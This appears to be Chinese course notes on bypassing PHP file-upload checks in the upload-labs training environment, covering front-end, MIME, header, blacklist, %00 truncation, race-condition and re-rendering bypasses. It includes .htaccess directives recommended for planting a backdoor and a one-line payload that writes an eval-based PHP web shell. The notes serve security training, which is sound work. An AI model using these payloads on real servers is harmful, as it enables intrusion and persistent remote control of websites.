Day47:WEB攻防-PHP应用&文件上传&函数缺陷&条件竞争&二次渲染&黑白名单&JS绕过

目录

文件上传与测试环境安装

1、前端 JS

2、.htaccess(apache独有的配置文件)

3、MIME类型

4、文件头判断

5、黑名单-过滤不严

6、黑名单-过滤不严

7、低版本GET-%00截断

8、低版本POST-%00截断

9、黑名单-过滤不严

10、逻辑不严-条件竞争

11、二次渲染

12、函数缺陷


知识点:

1、PHP-原生态-文件上传-检测后缀&黑白名单

2、PHP-原生态-文件上传-检测信息&类型内容

3、PHP-原生态-文件上传-函数缺陷&逻辑缺陷

4、PHP-原生态-文件上传-版本缺陷&配置缺陷

文件上传与测试环境安装

无文件解析安全问题上,格式解析是一对一的(不能jpg解析php)

换句话来说有解析错误配置或后缀解析漏洞时才能实现格式差异解析

文件上传安全指的是攻击者通过利用上传实现后门的写入连接后门进行权限控制的安全问题,对于如何确保这类安全问题,一般会从原生态功能中的文件内容,文件后缀,文件类型等方面判断,但是漏洞可能不仅在本身的代码验证逻辑中出现安全问题,也会在语言版本,语言函数,中间件,引用的第三方编辑器等存在缺陷地方配合利用。另外文件上传也有多个存储逻辑,不同的文件存储方案也会给攻击者带来不一样的挑战!

测试环境安装:

https://github.com/ffffffff0x/f8x
https://github.com/fuzzdb-project/fuzzdb
https://github.com/sqlsec/upload-labs-docker
下载上述资源

  1. docker安装     f8x -d 或 f8x -docker
  2. 进入项目文件夹    cd upload-labs-docker
  3. 一键部署运行   docker-compose up -d
     

1、前端 JS

如何判断是否是前端验证呢?

首先抓包监听,如果上传文件的时候还没有抓取到数据包,但是浏览器就提示文件类型不正确的话,那么这个多半就是前端校验了

如何绕过?先上传一个图片后缀抓包改成脚本后缀

2、.htaccess(apache独有的配置文件)

一般上传用的不多,主要用来留后门;apache中,.htaccess文件可以上传并执行,这个文件定义了哪个文件可以以脚本方式运行。

方式一:在.htaccess中写入:

<FilesMatch "s.jpg">
	SetHandler application/x-httpd-php
</FilesMatch>

然后再上传s.jpg的木马, 这样s.jpg就可解析为php文件
最好拿到shell之后修改自带的这个文件,添加上面的那段代码,就可以留个后门了

方式二:

AddType application/x-httpd-php .png  

当htaccess文件成功上传后,这时候再上传一个png图片的后门,就可以解析成脚本

3、MIME类型

Content-Type:image/png || image/jpeg

4、文件头判断

GIF89a

5、黑名单-过滤不严

str_ireplace()函数替换字符串中的一些字符(不区分大小写)

无递归(只检测一次,没循环)

phphp(因为代码中是把匹配到的黑名单替换为空)

6、黑名单-过滤不严

windows中大小写没问题,但是在linux上是不能大小写的,要么全小写,要么全大写

系统大小写敏感属性

str_ireplace()函数替换字符串中的一些字符(不区分大小写)

7、低版本GET-%00截断

这种方式适用于:

  • magic_quotes_gpc = 0ff
  • PHP 版本小于 5.3.4

自动解码一次,/var/www/html/upload/x.php%00

url 上面  %00 

post 下面 %00 二次解码

8、低版本POST-%00截断

这种方式适用于:

  • magic_quotes_gpc = 0ff
  • PHP 版本小于 5.3.4

手工解码一次,…/upload/x.php%00 二次解码

url 上面  %00 

post 下面 %00 二次解码

9、黑名单-过滤不严

php3

利用fuzz思路去跑后缀

字典下载地址:https://github.com/fuzzdb-project/fuzzdb

10、逻辑不严-条件竞争

上传不断发包

请求不断发包

访问创建脚本代码

<?php fputs(fopen('xiao.php','w'),'<?php eval($_REQUEST[1]);?>');?>

11、二次渲染

后端语言会对图片进行二次渲染,让图片更好的呈现出来,但是这样就会造成一个图片里插入的脚本代码丢失的情况

先搞个正常图片,上传图片后导出渲染后的图片

对比保留部分,在保留部分添加后门代码

最后利用提示的文件包含执行图片后门代码

12、函数缺陷

使用move_uploaded_file 函

保存的文件名可控

shell.php/.

  • 27
    点赞
  • 15
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Dao-道法自然

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值